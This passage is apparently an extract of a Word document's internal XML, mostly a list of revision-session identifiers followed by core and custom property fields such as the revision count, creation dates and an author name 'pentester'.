    <w:rsid w:val="00274B4B"/>
    <w:rsid w:val="002777CC"/>
    <w:rsid w:val="002A22A3"/>
    <w:rsid w:val="002A32EC"/>
    <w:rsid w:val="002A7888"/>
    <w:rsid w:val="002B338C"/>
    <w:rsid w:val="002C5444"/>
    <w:rsid w:val="002D5404"/>
    <w:rsid w:val="002E03DA"/>
    <w:rsid w:val="00303FF3"/>
    <w:rsid w:val="00322F87"/>
    <w:rsid w:val="003245B4"/>
    <w:rsid w:val="00326CD0"/>
    <w:rsid w:val="00332223"/>
    <w:rsid w:val="00341B5B"/>
    <w:rsid w:val="0034497B"/>
    <w:rsid w:val="0038395B"/>
    <w:rsid w:val="003855B6"/>
    <w:rsid w:val="00385A67"/>
    <w:rsid w:val="00390D02"/>
    <w:rsid w:val="003A29FB"/>
    <w:rsid w:val="003B3C3F"/>
    <w:rsid w:val="003B460E"/>
    <w:rsid w:val="003C164B"/>
    <w:rsid w:val="003E0CFF"/>
    <w:rsid w:val="003E2DF6"/>
    <w:rsid w:val="003E3BD0"/>
    <w:rsid w:val="003E67CE"/>
    <w:rsid w:val="003E734E"/>
    <w:rsid w:val="003F5BAA"/>
    <w:rsid w:val="0040279B"/>
    <w:rsid w:val="004032DB"/>
    <w:rsid w:val="004257F9"/>
    <w:rsid w:val="0045236F"/>
    <w:rsid w:val="00455762"/>
    <w:rsid w:val="004575AD"/>
    <w:rsid w:val="00457890"/>
    <w:rsid w:val="004679F7"/>
    <w:rsid w:val="00470471"/>
    <w:rsid w:val="0047651E"/>
    <w:rsid w:val="004845F5"/>
    <w:rsid w:val="0048541F"/>
    <w:rsid w:val="004908AD"/>
    <w:rsid w:val="00496547"/>
    <w:rsid w:val="004B2303"/>
    <w:rsid w:val="004C0110"/>
    <w:rsid w:val="004D00B4"/>
    <w:rsid w:val="004E1353"/>
    <w:rsid w:val="004E6D84"/>
    <w:rsid w:val="004F592E"/>
    <w:rsid w:val="004F63C6"/>
    <w:rsid w:val="00510BA1"/>
    <w:rsid w:val="00511FD2"/>
    <w:rsid w:val="00511FDF"/>
    <w:rsid w:val="00514041"/>
    <w:rsid w:val="005200AA"/>
    <w:rsid w:val="00523D49"/>
    <w:rsid w:val="00523F0D"/>
    <w:rsid w:val="00526EFE"/>
    <w:rsid w:val="005312B9"/>
    <w:rsid w:val="00535A9F"/>
    <w:rsid w:val="00536AEA"/>
    <w:rsid w:val="00537098"/>
    <w:rsid w:val="00537A67"/>
    <w:rsid w:val="00541676"/>
    <w:rsid w:val="0054368D"/>
    <w:rsid w:val="00545E91"/>
    <w:rsid w:val="005622A8"/>
    <w:rsid w:val="00563BC4"/>
    <w:rsid w:val="005813B4"/>
    <w:rsid w:val="00594FC8"/>
    <w:rsid w:val="005A5798"/>
    <w:rsid w:val="005B4FE4"/>
    <w:rsid w:val="005E37B1"/>
    <w:rsid w:val="005E7DBC"/>
    <w:rsid w:val="005F1AC1"/>
    <w:rsid w:val="00612727"/>
    <w:rsid w:val="0061646D"/>
    <w:rsid w:val="00621F22"/>
    <w:rsid w:val="00631AA5"/>
    <w:rsid w:val="0063717D"/>
    <w:rsid w:val="00644A7C"/>
    <w:rsid w:val="0064725A"/>
    <w:rsid w:val="006539BB"/>
    <w:rsid w:val="00662AB7"/>
    <w:rsid w:val="006744F8"/>
    <w:rsid w:val="0067742B"/>
    <w:rsid w:val="006945E6"/>
    <w:rsid w:val="0069798D"/>
    <w:rsid w:val="00697D09"/>
    <w:rsid w:val="006A379E"/>
    <w:rsid w:val="006A4B32"/>
    <w:rsid w:val="006B4ABF"/>
    <w:rsid w:val="006C34B9"/>
    <w:rsid w:val="006C6BCD"/>
    <w:rsid w:val="006F47CC"/>
    <w:rsid w:val="006F6F4C"/>
    <w:rsid w:val="006F7B74"/>
    <w:rsid w:val="00730899"/>
    <w:rsid w:val="00733898"/>
    <w:rsid w:val="00737BAF"/>
    <w:rsid w:val="00751D32"/>
    <w:rsid w:val="00760114"/>
    <w:rsid w:val="00794A3D"/>
    <w:rsid w:val="007A0B81"/>
    <w:rsid w:val="007B0BAD"/>
    <w:rsid w:val="007B6359"/>
    <w:rsid w:val="007C3E9D"/>
    <w:rsid w:val="007C4D9A"/>
    <w:rsid w:val="007F51D3"/>
    <w:rsid w:val="008103FF"/>
    <w:rsid w:val="00813686"/>
    <w:rsid w:val="00815D52"/>
    <w:rsid w:val="008269C9"/>
    <w:rsid w:val="008345A2"/>
    <w:rsid w:val="00836F5B"/>
    <w:rsid w:val="0083735C"/>
    <w:rsid w:val="00855631"/>
    <w:rsid w:val="008564AD"/>
    <w:rsid w:val="00860697"/>
    <w:rsid w:val="008643B6"/>
    <w:rsid w:val="00864D8F"/>
    <w:rsid w:val="0086667B"/>
    <w:rsid w:val="00883780"/>
    <w:rsid w:val="008B1897"/>
    <w:rsid w:val="008C02E8"/>
    <w:rsid w:val="008C0EEA"/>
    <w:rsid w:val="008C62C5"/>
    <w:rsid w:val="008E04C6"/>
    <w:rsid w:val="00901CF7"/>
    <w:rsid w:val="00903AF1"/>
    <w:rsid w:val="00906ABC"/>
    <w:rsid w:val="009146F7"/>
    <w:rsid w:val="0091476E"/>
    <w:rsid w:val="009151CB"/>
    <w:rsid w:val="0091696A"/>
    <w:rsid w:val="00934CAC"/>
    <w:rsid w:val="00935A14"/>
    <w:rsid w:val="00941113"/>
    <w:rsid w:val="00955D97"/>
    <w:rsid w:val="0096715E"/>
    <w:rsid w:val="00971CA2"/>
    <w:rsid w:val="00983857"/>
    <w:rsid w:val="00985126"/>
    <w:rsid w:val="00985EF1"/>
    <w:rsid w:val="009A1C7B"/>
    <w:rsid w:val="009B24A1"/>
    <w:rsid w:val="009B70B7"/>
    <w:rsid w:val="009C2F89"/>
    <w:rsid w:val="009C31ED"/>
    <w:rsid w:val="009C41D9"/>
    <w:rsid w:val="009C62A0"/>
    <w:rsid w:val="009D1C66"/>
    <w:rsid w:val="009D1E72"/>
    <w:rsid w:val="009D685F"/>
    <w:rsid w:val="009E1F17"/>
    <w:rsid w:val="009E622B"/>
    <w:rsid w:val="009F3175"/>
    <w:rsid w:val="009F4A94"/>
    <w:rsid w:val="00A010EA"/>
    <w:rsid w:val="00A0294C"/>
    <w:rsid w:val="00A1155A"/>
    <w:rsid w:val="00A211C1"/>
    <w:rsid w:val="00A22D3C"/>
    <w:rsid w:val="00A24B67"/>
    <w:rsid w:val="00A3717F"/>
    <w:rsid w:val="00A413C2"/>
    <w:rsid w:val="00A576F2"/>
    <w:rsid w:val="00A81CA0"/>
    <w:rsid w:val="00A83A29"/>
    <w:rsid w:val="00A85771"/>
    <w:rsid w:val="00A85F3E"/>
    <w:rsid w:val="00A93536"/>
    <w:rsid w:val="00AA2755"/>
    <w:rsid w:val="00AB0348"/>
    <w:rsid w:val="00AB1085"/>
    <w:rsid w:val="00AB3304"/>
    <w:rsid w:val="00AD37CA"/>
    <w:rsid w:val="00B00B9F"/>
    <w:rsid w:val="00B04F42"/>
    <w:rsid w:val="00B10677"/>
    <w:rsid w:val="00B2403E"/>
    <w:rsid w:val="00B271D9"/>
    <w:rsid w:val="00B308DF"/>
    <w:rsid w:val="00B33161"/>
    <w:rsid w:val="00B33CE8"/>
    <w:rsid w:val="00B42683"/>
    <w:rsid w:val="00B5182D"/>
    <w:rsid w:val="00B57E35"/>
    <w:rsid w:val="00B67204"/>
    <w:rsid w:val="00B73B70"/>
    <w:rsid w:val="00B74F6B"/>
    <w:rsid w:val="00B84277"/>
    <w:rsid w:val="00B90051"/>
    <w:rsid w:val="00B940ED"/>
    <w:rsid w:val="00BA12E4"/>
    <w:rsid w:val="00BA48AA"/>
    <w:rsid w:val="00BC0965"/>
    <w:rsid w:val="00BC0C1F"/>
    <w:rsid w:val="00BC2015"/>
    <w:rsid w:val="00BC3577"/>
    <w:rsid w:val="00BD2CE8"/>
    <w:rsid w:val="00BD2DD7"/>
    <w:rsid w:val="00BD410B"/>
    <w:rsid w:val="00BD4357"/>
    <w:rsid w:val="00BD4C3C"/>
    <w:rsid w:val="00C0166C"/>
    <w:rsid w:val="00C0620A"/>
    <w:rsid w:val="00C11940"/>
    <w:rsid w:val="00C12FFE"/>
    <w:rsid w:val="00C25268"/>
    <w:rsid w:val="00C25F09"/>
    <w:rsid w:val="00C304D3"/>
    <w:rsid w:val="00C33324"/>
    <w:rsid w:val="00C3374A"/>
    <w:rsid w:val="00C4500C"/>
    <w:rsid w:val="00C45658"/>
    <w:rsid w:val="00C54A7A"/>
    <w:rsid w:val="00C6169A"/>
    <w:rsid w:val="00C63A3F"/>
    <w:rsid w:val="00C67F99"/>
    <w:rsid w:val="00C7796A"/>
    <w:rsid w:val="00C800E9"/>
    <w:rsid w:val="00C823C9"/>
    <w:rsid w:val="00C91084"/>
    <w:rsid w:val="00CA14D5"/>
    <w:rsid w:val="00CA5FA2"/>
    <w:rsid w:val="00CC7A82"/>
    <w:rsid w:val="00CD4D22"/>
    <w:rsid w:val="00CE7B3A"/>
    <w:rsid w:val="00D04933"/>
    <w:rsid w:val="00D30811"/>
    <w:rsid w:val="00D32B1E"/>
    <w:rsid w:val="00D43EF5"/>
    <w:rsid w:val="00D447B7"/>
    <w:rsid w:val="00D44B96"/>
    <w:rsid w:val="00D51C2D"/>
    <w:rsid w:val="00D54937"/>
    <w:rsid w:val="00D54B57"/>
    <w:rsid w:val="00D57146"/>
    <w:rsid w:val="00D63BAF"/>
    <w:rsid w:val="00D8549C"/>
    <w:rsid w:val="00D85BE2"/>
    <w:rsid w:val="00D93B7A"/>
    <w:rsid w:val="00D93BCD"/>
    <w:rsid w:val="00DA08B7"/>
    <w:rsid w:val="00DC188F"/>
    <w:rsid w:val="00DE3C45"/>
    <w:rsid w:val="00DF5FD8"/>
    <w:rsid w:val="00E06F03"/>
    <w:rsid w:val="00E11BDC"/>
    <w:rsid w:val="00E312B1"/>
    <w:rsid w:val="00E32B41"/>
    <w:rsid w:val="00E4064B"/>
    <w:rsid w:val="00E41399"/>
    <w:rsid w:val="00E4467F"/>
    <w:rsid w:val="00E46BEA"/>
    <w:rsid w:val="00E475F0"/>
    <w:rsid w:val="00E60671"/>
    <w:rsid w:val="00E60E26"/>
    <w:rsid w:val="00E64D9A"/>
    <w:rsid w:val="00E6670B"/>
    <w:rsid w:val="00E72774"/>
    <w:rsid w:val="00E8168C"/>
    <w:rsid w:val="00E8250D"/>
    <w:rsid w:val="00E97B9F"/>
    <w:rsid w:val="00EA0BF5"/>
    <w:rsid w:val="00EA5BBE"/>
    <w:rsid w:val="00EA6212"/>
    <w:rsid w:val="00EB1167"/>
    <w:rsid w:val="00EC306D"/>
    <w:rsid w:val="00ED19EF"/>
    <w:rsid w:val="00ED4E73"/>
    <w:rsid w:val="00ED5BAC"/>
    <w:rsid w:val="00EE36C3"/>
    <w:rsid w:val="00EE3AEE"/>
    <w:rsid w:val="00EF0182"/>
    <w:rsid w:val="00EF0315"/>
    <w:rsid w:val="00EF487E"/>
    <w:rsid w:val="00F012ED"/>
    <w:rsid w:val="00F05C40"/>
    <w:rsid w:val="00F06CC5"/>
    <w:rsid w:val="00F16B83"/>
    <w:rsid w:val="00F24E91"/>
    <w:rsid w:val="00F3189D"/>
    <w:rsid w:val="00F53286"/>
    <w:rsid w:val="00F539AE"/>
    <w:rsid w:val="00F55335"/>
    <w:rsid w:val="00F744DB"/>
    <w:rsid w:val="00F756C5"/>
    <w:rsid w:val="00F77F23"/>
    <w:rsid w:val="00F938B9"/>
    <w:rsid w:val="00F97563"/>
    <w:rsid w:val="00FA0C72"/>
    <w:rsid w:val="00FC6151"/>
    <w:rsid w:val="00FC78EA"/>
    <w:rsid w:val="00FE1E7F"/>
    <w:rsid w:val="00FE3F4D"/>
    <w:rsid w:val="00FE4601"/>
    <w:rsid w:val="00FF16BA"/>
    <w:rsid w:val="4FB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A6A6"/>
  <w15:docId w15:val="{38AF0AD4-C5DC-4B27-B5ED-8881805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3B460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1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pentester</cp:lastModifiedBy>
  <cp:revision>206</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-10-16T10:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-15T08:19:00Z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C3E453BFF82743E2AB55616DFA624C6F_12</vt:lpwstr>
  </property>
</Properties>
</file>